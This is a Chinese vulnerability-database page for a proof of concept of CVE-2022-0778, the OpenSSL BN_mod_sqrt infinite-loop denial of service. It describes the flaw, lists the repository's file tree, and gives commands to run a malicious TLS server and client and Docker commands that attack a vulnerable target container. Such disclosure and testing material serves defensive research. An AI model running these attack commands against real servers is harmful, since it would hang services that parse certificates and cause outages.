漏洞平台

POC详情： f288e6c14864bfe72d974e2ded35d37b12c656c1

来源

https://github.com/yywing/cve-2022-0778

关联漏洞

标题： OpenSSL 安全漏洞 (CVE-2022-0778)
描述：OpenSSL是Openssl团队的一个开源的能够实现安全套接层（SSLv2/v3）和安全传输层（TLSv1）协议的通用加密库。该产品支持多种加密算法，包括对称密码、哈希算法、安全散列算法等。 OpenSSL1.0.2 版本、1.1.1版本和3.0版本存在安全漏洞，该漏洞源于计算模平方根的BN_mod_sqrt() 函数存在错误，可能导致对于非素数模数无线循环。攻击者可以发送特殊的函数参数值利用该漏洞导致应用在解析证书的过程中触发拒绝服务。

介绍

# cve-2022-0778

## bad server

```
go run server/main.go --addr 127.0.0.1:12345

cd test && test_server.sh

docker stat
```

## bad client

```
cd test && test_client.sh

go run client/main.go  --network tcp --addr 127.0.0.1:12345

docker stat
```

## build

```
docker build -t cve-2022-0778 .
```

## docker hub

```
# start vulned server
docker pull yywing/cve-2022-0778-target
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778-target python server.py
# attack
docker pull yywing/cve-2022-0778
docker run -it --rm --entrypoint badclient yywing/cve-2022-0778 --addr host.docker.internal:12345

# start bad server
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345
# use vulned client
docker run -it --rm yywing/cve-2022-0778-target python -c "import http.client;http.client.HTTPSConnection('host.docker.internal', 12345).request('GET', '/')"
# or
docker run -it --rm yywing/cve-2022-0778-target curl https://host.docker.internal:12345
```

文件快照


 [4.0K]  /data/pocs/f288e6c14864bfe72d974e2ded35d37b12c656c1
├── [4.0K]  certfile
│   ├── [ 492]  badcert.der
│   ├── [ 206]  cert.go
│   ├── [1.2K]  server.crt
│   └── [1.6K]  server.key
├── [4.0K]  client
│   └── [1.0K]  main.go
├── [4.0K]  cpu
│   ├── [ 194]  cpu_386.go
│   ├── [ 196]  cpu_amd64.go
│   ├── [ 247]  cpu_arm64_android.go
│   ├── [ 967]  cpu_arm64_darwin.go
│   ├── [ 865]  cpu_arm64_freebsd.go
│   ├── [ 812]  cpu_arm64.go
│   ├── [2.0K]  cpu_arm64_hwcap.go
│   ├── [ 281]  cpu_arm64_linux.go
│   ├── [ 547]  cpu_arm64_other.go
│   ├── [ 439]  cpu_arm64.s
│   ├── [ 821]  cpu_arm.go
│   ├── [6.8K]  cpu.go
│   ├── [ 697]  cpu_mips64x.go
│   ├── [ 220]  cpu_mips.go
│   ├── [ 220]  cpu_mipsle.go
│   ├── [ 620]  cpu_no_name.go
│   ├── [ 485]  cpu_ppc64x_aix.go
│   ├── [ 505]  cpu_ppc64x.go
│   ├── [ 747]  cpu_ppc64x_linux.go
│   ├── [ 220]  cpu_riscv64.go
│   ├── [ 276]  cpu.s
│   ├── [5.9K]  cpu_s390x.go
│   ├── [2.2K]  cpu_s390x.s
│   ├── [1.4K]  cpu_s390x_test.go
│   ├── [ 220]  cpu_wasm.go
│   ├── [4.2K]  cpu_x86.go
│   ├── [ 600]  cpu_x86.s
│   └── [ 200]  export_test.go
├── [ 363]  Dockerfile
├── [ 167]  go.mod
├── [1.0K]  go.sum
├── [ 973]  README.md
├── [4.0K]  server
│   └── [1.2K]  main.go
├── [4.0K]  test
│   ├── [ 137]  Dockerfile
│   ├── [  22]  server.crt -> ../certfile/server.crt
│   ├── [  22]  server.key -> ../certfile/server.key
│   ├── [1.0K]  server.py
│   ├── [ 125]  test_clinet.sh
│   └── [ 158]  test_server.sh
└── [4.0K]  tls
    ├── [3.9K]  alert.go
    ├── [9.8K]  auth.go
    ├── [6.9K]  auth_test.go
    ├── [ 25K]  cipher_suites.go
    ├── [ 52K]  common.go
    ├── [3.3K]  common_string.go
    ├── [ 46K]  conn.go
    ├── [9.7K]  conn_test.go
    ├── [7.8K]  example_test.go
    ├── [4.9K]  generate_cert.go
    ├── [ 27K]  handshake_client.go
    ├── [ 77K]  handshake_client_test.go
    ├── [ 20K]  handshake_client_tls13.go
    ├── [ 45K]  handshake_messages.go
    ├── [ 13K]  handshake_messages_test.go
    ├── [ 24K]  handshake_server.go
    ├── [ 62K]  handshake_server_test.go
    ├── [ 25K]  handshake_server_tls13.go
    ├── [ 24K]  handshake_test.go
    ├── [ 470]  handshake_unix_test.go
    ├── [ 12K]  key_agreement.go
    ├── [5.9K]  key_schedule.go
    ├── [5.6K]  key_schedule_test.go
    ├── [2.4K]  link_test.go
    ├── [8.4K]  prf.go
    ├── [5.7K]  prf_test.go
    ├── [ 12K]  testdata
    │   ├── [ 10K]  Client-TLSv10-ClientCert-ECDSA-ECDSA
    │   ├── [ 10K]  Client-TLSv10-ClientCert-ECDSA-RSA
    │   ├── [8.3K]  Client-TLSv10-ClientCert-Ed25519
    │   ├── [10.0K]  Client-TLSv10-ClientCert-RSA-ECDSA
    │   ├── [ 10K]  Client-TLSv10-ClientCert-RSA-RSA
    │   ├── [6.8K]  Client-TLSv10-ECDHE-ECDSA-AES
    │   ├── [7.1K]  Client-TLSv10-ECDHE-RSA-AES
    │   ├── [   0]  Client-TLSv10-Ed25519
    │   ├── [7.1K]  Client-TLSv10-ExportKeyingMaterial
    │   ├── [6.2K]  Client-TLSv10-RSA-RC4
    │   ├── [6.9K]  Client-TLSv11-ECDHE-ECDSA-AES
    │   ├── [7.2K]  Client-TLSv11-ECDHE-RSA-AES
    │   ├── [   0]  Client-TLSv11-Ed25519
    │   ├── [6.2K]  Client-TLSv11-RSA-RC4
    │   ├── [6.4K]  Client-TLSv12-AES128-GCM-SHA256
    │   ├── [7.1K]  Client-TLSv12-AES128-SHA256
    │   ├── [6.4K]  Client-TLSv12-AES256-GCM-SHA384
    │   ├── [6.9K]  Client-TLSv12-ALPN
    │   ├── [6.7K]  Client-TLSv12-ALPN-NoMatch
    │   ├── [ 10K]  Client-TLSv12-ClientCert-ECDSA-ECDSA
    │   ├── [ 10K]  Client-TLSv12-ClientCert-ECDSA-RSA
    │   ├── [8.9K]  Client-TLSv12-ClientCert-Ed25519
    │   ├── [ 10K]  Client-TLSv12-ClientCert-RSA-AES256-GCM-SHA384
    │   ├── [ 10K]  Client-TLSv12-ClientCert-RSA-ECDSA
    │   ├── [ 10K]  Client-TLSv12-ClientCert-RSA-RSA
    │   ├── [ 10K]  Client-TLSv12-ClientCert-RSA-RSAPKCS1v15
    │   ├── [ 11K]  Client-TLSv12-ClientCert-RSA-RSAPSS
    │   ├── [6.9K]  Client-TLSv12-ECDHE-ECDSA-AES
    │   ├── [7.2K]  Client-TLSv12-ECDHE-ECDSA-AES128-SHA256
    │   ├── [6.5K]  Client-TLSv12-ECDHE-ECDSA-AES256-GCM-SHA384
    │   ├── [6.5K]  Client-TLSv12-ECDHE-ECDSA-AES-GCM
    │   ├── [6.2K]  Client-TLSv12-ECDHE-ECDSA-CHACHA20-POLY1305
    │   ├── [7.2K]  Client-TLSv12-ECDHE-RSA-AES
    │   ├── [7.5K]  Client-TLSv12-ECDHE-RSA-AES128-SHA256
    │   ├── [6.5K]  Client-TLSv12-ECDHE-RSA-CHACHA20-POLY1305
    │   ├── [5.0K]  Client-TLSv12-Ed25519
    │   ├── [6.7K]  Client-TLSv12-ExportKeyingMaterial
    │   ├── [7.3K]  Client-TLSv12-P256-ECDHE
    │   ├── [ 18K]  Client-TLSv12-RenegotiateOnce
    │   ├── [ 26K]  Client-TLSv12-RenegotiateTwice
    │   ├── [ 18K]  Client-TLSv12-RenegotiateTwiceRejected
    │   ├── [7.0K]  Client-TLSv12-RenegotiationRejected
    │   ├── [6.2K]  Client-TLSv12-RSA-RC4
    │   ├── [8.4K]  Client-TLSv12-SCT
    │   ├── [6.8K]  Client-TLSv12-X25519-ECDHE
    │   ├── [6.8K]  Client-TLSv13-AES128-SHA256
    │   ├── [6.9K]  Client-TLSv13-AES256-SHA384
    │   ├── [7.0K]  Client-TLSv13-ALPN
    │   ├── [6.8K]  Client-TLSv13-CHACHA20-SHA256
    │   ├── [ 11K]  Client-TLSv13-ClientCert-ECDSA-RSA
    │   ├── [9.2K]  Client-TLSv13-ClientCert-Ed25519
    │   ├── [ 10K]  Client-TLSv13-ClientCert-RSA-ECDSA
    │   ├── [ 11K]  Client-TLSv13-ClientCert-RSA-RSAPSS
    │   ├── [6.5K]  Client-TLSv13-ECDSA
    │   ├── [5.1K]  Client-TLSv13-Ed25519
    │   ├── [6.8K]  Client-TLSv13-ExportKeyingMaterial
    │   ├── [8.9K]  Client-TLSv13-HelloRetryRequest
    │   ├── [7.5K]  Client-TLSv13-KeyUpdate
    │   ├── [7.1K]  Client-TLSv13-P256-ECDHE
    │   ├── [6.8K]  Client-TLSv13-X25519-ECDHE
    │   ├── [ 587]  example-cert.pem
    │   ├── [ 227]  example-key.pem
    │   ├── [5.9K]  Server-TLSv10-ECDHE-ECDSA-AES
    │   ├── [7.0K]  Server-TLSv10-ExportKeyingMaterial
    │   ├── [5.6K]  Server-TLSv10-RSA-3DES
    │   ├── [5.9K]  Server-TLSv10-RSA-AES
    │   ├── [5.4K]  Server-TLSv10-RSA-RC4
    │   ├── [ 758]  Server-TLSv11-FallbackSCSV
    │   ├── [5.4K]  Server-TLSv11-RSA-RC4
    │   ├── [6.9K]  Server-TLSv12-ALPN
    │   ├── [6.8K]  Server-TLSv12-ALPN-Fallback
    │   ├── [ 985]  Server-TLSv12-ALPN-NoMatch
    │   ├── [6.8K]  Server-TLSv12-ALPN-NotConfigured
    │   ├── [9.5K]  Server-TLSv12-ClientAuthRequestedAndECDSAGiven
    │   ├── [8.2K]  Server-TLSv12-ClientAuthRequestedAndEd25519Given
    │   ├── [9.4K]  Server-TLSv12-ClientAuthRequestedAndGiven
    │   ├── [9.4K]  Server-TLSv12-ClientAuthRequestedAndPKCS1v15Given
    │   ├── [6.3K]  Server-TLSv12-ClientAuthRequestedNotGiven
    │   ├── [6.3K]  Server-TLSv12-ECDHE-ECDSA-AES
    │   ├── [4.2K]  Server-TLSv12-Ed25519
    │   ├── [6.6K]  Server-TLSv12-ExportKeyingMaterial
    │   ├── [6.8K]  Server-TLSv12-IssueTicket
    │   ├── [6.8K]  Server-TLSv12-IssueTicketPreDisable
    │   ├── [6.4K]  Server-TLSv12-P256
    │   ├── [3.3K]  Server-TLSv12-Resume
    │   ├── [6.8K]  Server-TLSv12-ResumeDisabled
    │   ├── [5.9K]  Server-TLSv12-RSA-3DES
    │   ├── [6.3K]  Server-TLSv12-RSA-AES
    │   ├── [6.1K]  Server-TLSv12-RSA-AES256-GCM-SHA384
    │   ├── [6.1K]  Server-TLSv12-RSA-AES-GCM
    │   ├── [5.6K]  Server-TLSv12-RSA-RC4
    │   ├── [5.7K]  Server-TLSv12-RSA-RSAPKCS1v15
    │   ├── [5.7K]  Server-TLSv12-RSA-RSAPSS
    │   ├── [6.3K]  Server-TLSv12-SNI
    │   ├── [6.3K]  Server-TLSv12-SNI-GetCertificate
    │   ├── [6.3K]  Server-TLSv12-SNI-GetCertificateNotFound
    │   ├── [6.1K]  Server-TLSv12-X25519
    │   ├── [7.5K]  Server-TLSv13-AES128-SHA256
    │   ├── [7.7K]  Server-TLSv13-AES256-SHA384
    │   ├── [7.5K]  Server-TLSv13-ALPN
    │   ├── [7.5K]  Server-TLSv13-ALPN-Fallback
    │   ├── [2.0K]  Server-TLSv13-ALPN-NoMatch
    │   ├── [7.5K]  Server-TLSv13-ALPN-NotConfigured
    │   ├── [7.5K]  Server-TLSv13-CHACHA20-SHA256
    │   ├── [ 14K]  Server-TLSv13-ClientAuthRequestedAndECDSAGiven
    │   ├── [ 11K]  Server-TLSv13-ClientAuthRequestedAndEd25519Given
    │   ├── [ 13K]  Server-TLSv13-ClientAuthRequestedAndGiven
    │   ├── [7.8K]  Server-TLSv13-ClientAuthRequestedNotGiven
    │   ├── [7.2K]  Server-TLSv13-ECDHE-ECDSA-AES
    │   ├── [5.7K]  Server-TLSv13-Ed25519
    │   ├── [7.4K]  Server-TLSv13-ExportKeyingMaterial
    │   ├── [9.2K]  Server-TLSv13-HelloRetryRequest
    │   ├── [7.4K]  Server-TLSv13-IssueTicket
    │   ├── [7.4K]  Server-TLSv13-IssueTicketPreDisable
    │   ├── [7.7K]  Server-TLSv13-P256
    │   ├── [4.4K]  Server-TLSv13-Resume
    │   ├── [7.4K]  Server-TLSv13-ResumeDisabled
    │   ├── [7.1K]  Server-TLSv13-Resume-HelloRetryRequest
    │   ├── [7.3K]  Server-TLSv13-RSA-RSAPSS
    │   ├── [1.0K]  Server-TLSv13-RSA-RSAPSS-TooSmall
    │   └── [7.3K]  Server-TLSv13-X25519
    ├── [5.2K]  ticket.go
    ├── [ 12K]  tls.go
    └── [ 47K]  tls_test.go

7 directories, 194 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。